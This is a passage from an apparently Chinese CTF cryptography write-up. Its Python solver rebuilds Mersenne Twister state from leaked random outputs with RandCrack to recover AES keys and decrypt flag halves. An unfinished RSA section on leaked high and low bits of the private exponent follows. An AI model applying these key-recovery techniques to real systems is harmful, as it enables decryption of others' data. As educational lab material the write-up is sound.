2617877628]
c1 = b'\x04\xd6k\xe5:\x9a\xabu\xb3\r\x06\xd9\x8e\x04\x87\xc7\x10\xecv\x0bG,\x9c\xb5\xb5q\xd6\x9c\xb8\xb7\xb1d'
c2 = b'CT\x1a>\x12\x8ff"\x89\xde\x9a\x0f\xf4\xac\xa2\xe7\xd2%\x15\xdd`\x03\xf4?u\x07#\xf9\x03\xde\xd4\x97'
# Part 1: all 624 outputs of the first generator are known, so RandCrack can
# rebuild the complete internal state and replay the next 624 outputs whose
# sum was used as key material.
rc = RandCrack()
for observed in k1:
    rc.submit(observed)
cal = sum(rc.predict_getrandbits(32) for _ in range(624))
key = hashlib.sha256(str(cal).encode()).digest()
aes1 = AES.new(key, AES.MODE_ECB)
# The plaintext was padded before encryption and is not unpadded here, so the
# decoded string still carries the padding bytes at its end.
flag1 = aes1.decrypt(c1).decode()

# Part 2: only 600 of the 624 outputs are known. RandCrack needs exactly 624
# submissions, so the last 24 slots are filled with arbitrary values.
# This is harmless because in MT19937 state word k+624 is computed from words
# k, k+1 and k+397 only. The 624 // 4 = 156 predicted outputs use k = 0..155,
# i.e. indices up to 155 + 397 = 552 < 600, so the filler is never read.
rc = RandCrack()
for position in range(600):
    rc.submit(k2[position])
for _ in range(600, 624):
    rc.submit(random.getrandbits(32))
cal = sum(rc.predict_getrandbits(32) for _ in range(624 // 4))
key = hashlib.sha256(str(cal).encode()).digest()
aes2 = AES.new(key, AES.MODE_ECB)
flag2 = aes2.decrypt(c2).decode()

flag = flag1 + flag2
print(flag)

这里考察的是MT19937随机数生成算法,在flag1中由于我们知道了前一轮的所有随机数(624个随机数),因此我们可以通过RandCrack()预测下一轮的随机数

flag2中,题目只给了我们前600个随机数,还缺少24个随机数才能组成一轮完整的state,于是我有个大胆的想法,给它随机的24个随机数会怎么样,结果误打误撞解出flag了,想查查到底是什么原因,但都没找到相关的介绍,都是教我怎么逆MT19937算法的跟简单介绍,貌似用处不大

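但,伟大的糖醋小鸡块师傅在他的博客中帮我解疑了,Orz
https://tangcuxiaojikuai.xyz/post/1dda48e6.html
简单来说:在 MT19937 的递推中,第 k+624 个状态字只由第 k、k+1、k+397 个状态字决定;这里只需要预测后面 624//4=156 个数,用到的下标最大是 155+397=552<600,所以缺失的第 600~623 个数填什么都不影响结果。这也说明 random 模块的输出不能用来派生密钥,应改用 secrets 或 os.urandom。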

rsa()

#https://github.com/jvdsn/crypto-attacks
n = 149172698687247343307484774427463947040435385939538317995577802933708356659744781308849658149199463270402946054959026247011496643609722381036883462993606208405454448793748282856217226973570288117498818638210423816294135228225752144034736417495450129714250843040389723696691326017062575682989124677170212774709
e = 117932126002671581139669626170313849654365346787524775666511151162210096339679521576248537514813055641658722582914817481701142826861992970974206985137736311670025047752207632786439134855261541672012123572997654885689727972923659090161642085293034838535696206768459211817851404605357080649176502772728128885161
c = 5560665954852260703690321742771294743847646190564920056638605621636133720600072404637746086157764356927591996611862975162275415163691292729424412545560091018172812509230401361899309377868998693154480684535377865697939714965280441927137203589475324582174585416573174423912557361267766810988676863548944796515
# dm and dl are the two leaked pieces of the private exponent d; the note
# below this listing describes them as its high and low bits (presumably
# "most" / "least" significant — confirm against the challenge source).
dm = 0x2498aa4c85de5a33d5766f28d879f0df7175f43dd71cd4ab56ab67bf76334e6e3dcb
dl = 0x4c21c14305c34ed8f5e8879452c4ce569ce0789e6b39
# Placeholder, presumably for the unknown middle part of d that has to be
# recovered; this line is not valid Python as written.
d_zj=???

d的高低位泄露,见糖醋小鸡块师傅的高校密码挑战赛赛题5
https://tangcuxiaojikuai.xyz/post/4a67318c.html
由于我使用的是sage10.4与师傅使用到的sage10.2不一样,脚本使用到的部分函数在10.4版本中已经进行了调整,不会改脚本了QWQ

如果要安装sage指定版本的话,貌似要从源码进行编译,坏就坏在这些地方了,最新版也不是想象中的那么好

总结

格密码方面的知识储备非常薄弱,QWQ